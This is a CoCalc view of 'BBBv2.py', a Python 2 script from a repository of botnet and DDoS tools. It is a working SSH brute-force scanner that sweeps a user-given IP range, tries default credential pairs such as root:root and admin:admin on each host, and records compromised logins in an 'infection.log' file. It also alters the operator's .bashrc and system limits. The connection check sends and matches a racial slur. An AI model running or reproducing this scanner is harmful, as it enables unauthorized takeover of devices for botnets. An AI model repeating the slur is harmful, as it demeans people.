Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Scanning/SSH/BBBv2.py
5038 views
1
#!/usr/bin/env python
2
# Busybox Bang Bus v2
3
# WHATS NEW??? DEEZ NUTZ! HA GOTEM!
4
5
import threading, paramiko, random, socket, time, os, sys
6
7
os.system("clear")
8
if len(sys.argv) < 2:
9
print "BuSyBoX BaNG BuS v2"
10
print "Usage: python "+sys.argv[0]+" [Start IP] [End IP]"
11
sys.exit("Example: python "+sys.argv[0]+" 0.0.0.0 255.255.255.255")
12
13
sys.stdout.write("\x1b]2;BuSyBoX BaNG BuS\x07")
14
os.system("clear")
15
os.system("echo -e 'ulimit -s 999999; ulimit -n 999999; ulimit -u 999999\n' > ~/.bashrc")
16
os.system("ulimit -s 999999; ulimit -n 999999; ulimit -u 999999")
17
paramiko.util.log_to_file("/dev/null") #quiets paramiko output
18
os.system("sysctl -w fs.file-max=999999 >/dev/null")
19
20
passwords = [ # argv 0
21
"ubnt:ubnt",
22
"root:root",
23
"root:admin",
24
"admin:admin",
25
"root:1234",
26
"admin:1234",
27
"guest:guest",
28
"user:user",
29
"test:test",
30
]
31
32
raw_input("Press <ENTER> to Enter the Bang Bus")
33
credit = '# DO NOT SHARE THIS FUCKING SHIT' #throwback lulz
34
print "\033[0m" + credit + "\033[0m"
35
36
def ipRange(start_ip, end_ip):
37
start = list(map(int, start_ip.split(".")))
38
end = list(map(int, end_ip.split(".")))
39
temp = start
40
ip_range = []
41
42
ip_range.append(start_ip)
43
while temp != end:
44
start[3] += 1
45
for i in (3, 2, 1):
46
if temp[i] == 256:
47
temp[i] = 0
48
temp[i-1] += 1
49
ip_range.append(".".join(map(str, temp)))
50
51
return ip_range
52
class sshscanner(threading.Thread):
53
def __init__ (self, ip):
54
threading.Thread.__init__(self)
55
self.ip = str(ip)
56
global passwords
57
def run(self):
58
while 1:
59
try:
60
username='root'
61
password="0"
62
port = 22
63
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
64
s.settimeout(3)
65
s.connect((self.ip, port))
66
s.close()
67
ssh = paramiko.SSHClient()
68
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
69
dobreak=False
70
for passwd in passwords:
71
if ":n/a" in passwd:
72
password=""
73
else:
74
password=passwd.split(":")[1]
75
if "n/a:" in passwd:
76
username=""
77
else:
78
username=passwd.split(":")[0]
79
try:
80
ssh.connect(self.ip, port = port, username=username, password=password, timeout=3)
81
dobreak=True
82
break
83
except:
84
pass
85
if True == dobreak:
86
break
87
badserver=True
88
stdin, stdout, stderr = ssh.exec_command("echo nigger")
89
output = stdout.read()
90
if "nigger" in output:
91
badserver=False
92
if badserver == False:
93
os.system("echo -e " +username+ ":" +password+ ":" +self.ip+ " >> infection.log")
94
print "\033[31m[\033[32m+\033[31m]\033[0m", random.choice(["\033[32mBuSyBoXiNG -> " +username+ ":" +password+ ":" +self.ip+ "\033[0m",
95
"\033[35mBuSyBoXiNG -> " +username+ ":" +password+ ":" +self.ip+ "\033[0m",
96
"\033[36mBuSyBoXiNG -> " +username+ ":" +password+ ":" +self.ip+ "\033[0m"])
97
ssh.exec_command("echo nigger")
98
time.sleep(3)
99
ssh.close()
100
except:
101
pass
102
ip_range = ipRange("" +sys.argv[1], "" +sys.argv[2])
103
for ip in ip_range:
104
try:
105
t = sshscanner(ip)
106
t.start()
107
except:
108
pass # LiGhT ThA BoSs
109
110